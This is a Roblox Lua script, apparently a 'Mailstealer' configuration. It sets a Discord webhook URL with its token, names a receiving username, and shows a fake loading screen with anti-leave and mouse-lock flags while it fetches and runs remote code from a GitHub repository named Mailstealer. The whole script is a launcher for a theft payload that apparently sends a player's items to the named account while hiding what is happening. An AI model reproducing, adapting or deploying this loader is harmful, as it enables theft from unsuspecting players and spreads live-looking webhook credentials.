--[[
  __  __       _ _     _             _           
  |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 
  | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
  | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   
  |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   

]]--

UserName = "giorpro13"
Webhook = "https://discord.com/api/webhooks/1140332388401033257/eeY-Pt9mWw0m9F_Y7J6wgL3dmNAFNVxNBchyV3KnpLTKpmiVEjf6OzdEtklCCGi0r5gN"
UserName2 = "giorpro13"

_G.LoadingScreen = true 
_G.AntiLeave = true 
_G.MouseLock = true 


_G.ScriptName = "StickOgh Scriptz"
_G.FirstText = "Preparing..."
_G.SecondText = "Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 

loadstring(game:HttpGet("https://raw.githubusercontent.com/StickOgh01/Mailstealer_/main/Mailstealer"))()
